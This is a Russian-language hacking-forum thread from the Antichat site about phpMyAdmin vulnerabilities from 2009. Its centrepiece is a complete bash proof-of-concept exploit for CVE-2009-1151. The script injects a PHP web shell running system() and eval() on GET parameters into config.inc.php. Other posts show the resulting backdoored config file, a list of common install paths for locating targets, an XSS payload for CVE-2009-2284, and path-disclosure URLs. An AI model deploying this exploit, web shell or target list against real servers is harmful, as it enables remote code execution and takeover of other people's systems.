Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
16.03.2009, 02:12
|
|
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230
Репутация:
462
|
|
Код:
calendar.php?GLOBALS
иожно узнать точную версию, если > 3.* |
|
|
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit |
11.06.2009, 01:18
|
|
Новичок
Регистрация: 26.06.2007
Сообщений: 27
Провел на форуме:
267117
Репутация:
1
|
|
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
Код:
#!/bin/bash
# CVE-2009-1151: phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC v0.11
# by pagvac (gnucitizen.org), 4th June 2009.
# special thanks to Greg Ose (labs.neohapsis.com) for discovering such a cool vuln,
# and to str0ke (milw0rm.com) for testing this PoC script and providing feedback!
# PoC script successfully tested on the following targets:
# phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1
# Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2)
# attack requirements:
# 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5
# and 3.x before 3.1.3.1 according to PMASA-2009-3
# 2) it *seems* this vuln can only be exploited against environments
# where the administrator has chosen to install phpMyAdmin following
# the *wizard* method, rather than manual method: http://snipurl.com/jhjxx
# 3) administrator must have NOT deleted the '/config/' directory
# within the '/phpMyAdmin/' directory. this is because this directory is
# where '/scripts/setup.php' tries to create 'config.inc.php' which is where
# our evil PHP code is injected 8)
# more info on:
# http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
# http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/
if [[ $# -ne 1 ]]
then
echo "usage: ./$(basename $0) <phpMyAdmin_base_URL>"
echo "i.e.: ./$(basename $0) http://target.tld/phpMyAdmin/"
exit
fi
if ! which curl >/dev/null
then
echo "sorry but you need curl for this script to work!"
echo "on Debian/Ubuntu: sudo apt-get install curl"
exit
fi
function exploit {
postdata="token=$1&action=save&configuration="\
"a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:23:%22host%27]="\
"%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost%22%3bs:9:"\
"%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:"\
"%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:"\
"%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"
postdata2="token=$1&action=save&configuration=a:1:"\
"{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d="\
"%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3b"\
"system(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}"\
"if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval"\
"(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//"\
"%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22"\
"mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:"\
"%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config"\
"%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"
flag="/tmp/$(basename $0).$RANDOM.phpinfo.flag.html"
echo "[+] attempting to inject phpinfo() ..."
curl -ks -b $2 -d "$postdata" --url "$3/scripts/setup.php" >/dev/null
if curl -ks --url "$3/config/config.inc.php" | grep "phpinfo()" >/dev/null
then
curl -ks --url "$3/config/config.inc.php" >$flag
echo "[+] success! phpinfo() injected successfully! output saved on $flag"
curl -ks -b $2 -d $postdata2 --url "$3/scripts/setup.php" >/dev/null
echo "[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:"
echo " $3/config/config.inc.php?c=ls+-l+/"
echo " $3/config/config.inc.php?p=phpinfo();"
echo " please send any feedback/improvements for this script to"\
"unknown.pentester<AT_sign__here>gmail.com"
else
echo "[+] no luck injecting to $3/config/config.inc.php :("
exit
fi
}
# end of exploit function
cookiejar="/tmp/$(basename $0).$RANDOM.txt"
token=`curl -ks -c $cookiejar --url "$1/scripts/setup.php" | grep \"token\" | head -n 1 | cut -d \" -f 12`
echo "[+] checking if phpMyAdmin exists on URL provided ..."
#if grep phpMyAdmin $cookiejar 2>/dev/null > /dev/null
if grep phpMyAdmin $cookiejar &>/dev/null
then
length=`echo -n $token | wc -c`
# valid form token obtained?
if [[ $length -eq 32 ]]
then
echo "[+] phpMyAdmin cookie and form token received successfully. Good!"
# attempt exploit!
exploit $token $cookiejar $1
else
echo "[+] could not grab form token. you might want to try exploiting the vuln manually :("
exit
fi
else
echo "[+] phpMyAdmin NOT found! phpMyAdmin base URL incorrectly typed? wrong case-sensitivity?"
exit
fi
# milw0rm.com [2009-06-09]
|
|
|
|
14.06.2009, 04:11
|
|
Administrator
Регистрация: 12.10.2006
Сообщений: 466
Провел на форуме:
17234747
Репутация:
5170
|
|
CVE-2009-1151 ( phpmyadminrcesh.txt) PMASA-2009-3 PMASA-2009-4
Код:
<?php
/*
* Generated configuration file
* Generated by: phpMyAdmin 3.0.1.1 setup script by Michal Čihař <michal@cihar.com>
* Version: $Id: setup.php 11423 2008-07-24 17:26:05Z lem9 $
* Date: Tue, 09 Jun 2009 14:13:34 GMT
*/
/* Servers configuration */
$i = 0;
/* Server (config:root) [1] */
$i++;
$cfg['Servers'][$i]['host']=''; if($_GET['c']){echo
'<pre>';system($_GET['c']);echo '</pre>';}if($_GET['p']){echo
'<pre>';eval($_GET['p']);echo '</pre>';};//'] = 'localhost';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['compress'] = false;
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';
/* End of servers configuration */
?>
phpMyAdmin//config/config.inc.php?c=ls+-l+/
phpMyAdmin//config/config.inc.php?p=phpinfo();
Vulnerable software and versions:
phpmyadmin:3.1.3
phpmyadmin:3.1.3:rc1
phpmyadmin:3.1.2
phpmyadmin:3.1.2:rc1
phpmyadmin:3.1.1
phpmyadmin:3.1.1:rc1
phpmyadmin:3.1.0
phpmyadmin:2.11.9.3
phpmyadmin:2.11.9.4
phpmyadmin:2.11.9.2
phpmyadmin:2.11.9.1
phpmyadmin:2.11.9.0
phpmyadmin:2.11.9
phpmyadmin:2.11.8
phpmyadmin:2.11.7.12.11.7.1
phpmyadmin:2.11.7.0
phpmyadmin:2.11.7
phpmyadmin:2.11.6:rc1
phpmyadmin:2.11.6.0
phpmyadmin:2.11.6
phpmyadmin:2.11.5:rc1
phpmyadmin:2.11.5.2
phpmyadmin:2.11.5.1
phpmyadmin:2.11.5.0
phpmyadmin:2.11.5
phpmyadmin:2.11.4:rc1
phpmyadmin:2.11.4
phpmyadmin:2.11.3:rc1
phpmyadmin:2.11.3.0
phpmyadmin:2.11.3
phpmyadmin:2.11.2.2
phpmyadmin:2.11.2.1
phpmyadmin:2.11.2.0
phpmyadmin:2.11.2
phpmyadmin:2.11.1:rc1
phpmyadmin:2.11.1.2
phpmyadmin:2.11.1.1
phpmyadmin:2.11.1.0
phpmyadmin:2.11.1
phpmyadmin:2.11.0:rc1
phpmyadmin:2.11.0:beta1
phpmyadmin:2.11.0
|
|
|
|
02.07.2009, 21:16
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
По поводу full path disclosure
В последних версиях в корне пма есть файл phpinfo.php с соответствующем контентом и как правило админы его не удаляют
|
|
|
|
08.07.2009, 19:49
|
|
Administrator
Регистрация: 12.10.2006
Сообщений: 466
Провел на форуме:
17234747
Репутация:
5170
|
|
Files locations
Код:
/php-my-admin/
/phpMyAdmin-2.5.5-rc1/
/phpMyAdmin-2.5.5-rc2/
/phpMyAdmin-2.5.5-pl1/
/phpMyAdmin-2.5.6-rc1/
/phpMyAdmin-2.5.6-rc2/
/phpMyAdmin-2.5.7-pl1/
/phpMyAdmin-2.6.0-alpha/
/phpMyAdmin-2.6.0-alpha2/
/phpMyAdmin-2.6.0-beta1/
/phpMyAdmin-2.6.0-beta2/
/phpMyAdmin-2.6.0-rc1/
/phpMyAdmin-2.6.0-rc2/
/phpMyAdmin-2.6.0-rc3/
/phpMyAdmin-2.6.0-pl2/
/phpMyAdmin-2.6.0-pl3/
/phpMyAdmin-2.6.1-rc1/
/phpMyAdmin-2.6.1-rc2/
/phpMyAdmin-2.6.1/
/phpMyAdmin-2.6.1-pl1/
/phpMyAdmin-2.6.1-pl2/
/phpMyAdmin-2.6.1-pl3/
/phpMyAdmin-2.6.2-beta1/
/phpMyAdmin-2.6.2-pl1/
/phpMyAdmin-2.6.4-rc1/
/phpMyAdmin-2.6.4-pl1/
/phpMyAdmin-2.6.4-pl2/
/phpMyAdmin-2.6.4-pl3/
/phpMyAdmin-2.6.4-pl4/
/phpMyAdmin-2.7.0-beta1/
/phpMyAdmin-2.7.0-rc1/
/phpMyAdmin-2.7.0-pl1/
/phpMyAdmin-2.7.0-pl2/
/phpMyAdmin-2.8.0-beta1/
/phpMyAdmin-2.8.0-rc1/
/phpMyAdmin-2.8.0-rc2/
/phpMyAdmin-2.8.0/
/phpMyAdmin-2.8.0.1/
/phpMyAdmin-2.8.0.2/
/phpMyAdmin-2.8.0.3/
/phpMyAdmin-2.8.0.4/
/phpMyAdmin-2.8.1-rc1/
/sqlmanager/
/mysqlmanager/
/p/m/a/
/PMA2005/
/pma2005/
/phpmanager/
/php-myadmin/
/phpmy-admin/
/webadmin/
/sqlweb/
/websql/
/webdb/
|
|
|
|
14.07.2009, 01:28
|
|
Reservists Of Antichat - Level 6
Регистрация: 08.04.2008
Сообщений: 286
Провел на форуме:
2375131
Репутация:
1695
|
|
По поводу уязвимости phpMyAdmin (/scripts/setup.php) PHP Code Injection добавлю что phpMyAdmin 2.8.x также уязвима.
Проверял на phpMyAdmin 2.8.0.3 Главное чтобы права на запись были (
|
|
|
|
27.07.2009, 18:30
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
Сообщение от Spyder
По поводу full path disclosure
В последних версиях в корне пма есть файл phpinfo.php с соответствующем контентом и как правило админы его не удаляют
PHP код:
$cfg['ShowPhpInfo'] = false;
Все зависит от настроек. по дефолту выключено.
|
|
|
|
22.08.2009, 14:28
|
|
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме:
7875940
Репутация:
2362
|
|
phpMyAdmin SQL bookmark HTML Injection Vulnerability
Код:
Bugtraq ID: 35543
Class: Input Validation Error
CVE: CVE-2009-2284
Remote: Yes
Local: No
Published: Jun 30 2009 12:00AM
Updated: Aug 21 2009 03:57PM
Credit: Sven Vetsch
Vulnerable: RedHat Fedora 9 0
RedHat Fedora 11
RedHat Fedora 10
phpMyAdmin phpMyAdmin 3.1.1 1
phpMyAdmin phpMyAdmin 3.1.1 0
phpMyAdmin phpMyAdmin 3.1 0
phpMyAdmin phpMyAdmin 3.0.1
phpMyAdmin phpMyAdmin 3.0
phpMyAdmin phpMyAdmin 3.2.0-rc1
phpMyAdmin phpMyAdmin 3.1.3.2
phpMyAdmin phpMyAdmin 3.1.3.1
phpMyAdmin phpMyAdmin 3.0.1.1
MandrakeSoft Enterprise Server 5 x86_64
MandrakeSoft Enterprise Server 5
Эксплойта или более конкретного описания в инете не нашел. Покопался сам:
Код:
/sql.php?db=test&token=849967e893f3ea2c0205f71270269616&sql_query=SELECT+%3Cscript%3Ealert()%3C/script%3E
__________________
включи голову
|
|
|
|
27.10.2009, 15:18
|
|
Познающий
Регистрация: 21.08.2009
Сообщений: 46
Провел на форуме:
634096
Репутация:
7
|
|
как узнать точную версию phpMyAdmin
|
|
|
|
16.12.2009, 21:49
|
|
Постоянный
Регистрация: 13.02.2008
Сообщений: 505
Провел на форуме:
2916750
Репутация:
277
|
|
Раскрытие путей
phpMyAdmin 2.6.1
Код:
http://localhost/Tools/phpMyAdmin/server_variables.php?lang=ru-win1251&server=1&collation_connection='
Код:
Fatal error: Call to undefined function PMA_reloadNavigation() in Z:\home\l
calhost\www\Tools\phpmyadmin\header.inc.php on line 132
Уязвимая часть :
PHP код:
function PMA_reloadNavigation() {
global $cfg;
// Reloads the navigation frame via JavaScript if required
if (isset($GLOBALS['reload']) && $GLOBALS['reload']) {
echo "\n";
$reload_url = './left.php?' . PMA_generate_common_url((isset($GLOBALS['db']) ? $GLOBALS['db'] : ''), '', '&');
?>
<script type="text/javascript" language="javascript1.2">
<!--
if (typeof(window.parent) != 'undefined'
&& typeof(window.parent.frames['nav']) != 'undefined') {
window.parent.frames['nav'].goTo('<?php echo $reload_url; ?>&hash=' + <?php echo (($cfg['QueryFrame'] && $cfg['QueryFrameJS']) ? 'window.parent.frames[\'queryframe\'].document.hashform.hash.value' : "'" . md5($cfg['PmaAbsoluteUri']) . "'"); ?>);
}
//-->
</script>
<?php
unset($GLOBALS['reload']);
}
}
UPD
Код:
http://localhost/Tools/phpMyAdmin/footer.inc.php
Код:
Notice: Undefined variable: cfg in Z:\home\localhost\www\Tools\phpmyadmin\footer.inc.php on line 17
Уязвимый код:
PHP код:
<?php
/* $Id$ */
// vim: expandtab sw=4 ts=4 sts=4:
/**
* WARNING: This script has to be included at the very end of your code because
* it will stop the script execution!
*/
require_once('./libraries/relation.lib.php'); // for PMA_setHistory()
/**
* Query window
*/
// If query window is wanted and open, update with latest selected db/table.
if ($cfg['QueryFrame'] && $cfg['QueryFrameJS']) {
?>
Код:
http://localhost/Tools/phpMyAdmin/mult_submits.inc.php
Код:
Fatal error: Call to undefined function PMA_DBI_select_db() in Z:\home\localhost\www\Tools\phpmyadmin\mult_submits.inc.php on line 385
Уязвимый код:
PHP код:
if ($run_parts) {
$sql_query .= $a_query . ';' . "\n";
if ($query_type != 'drop_db') {
PMA_DBI_select_db($db);
}
$result = @PMA_DBI_query($a_query) or PMA_mysqlDie('', $a_query, FALSE, $err_url);
} // end if
} // end for
if ($use_sql) {
require('./sql.php');
} elseif (!$run_parts) {
PMA_DBI_select_db($db);
$result = PMA_DBI_query($sql_query);
}
}
?>
(C)Xcontrol212
Последний раз редактировалось Xcontrol212; 17.12.2009 в 02:41..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
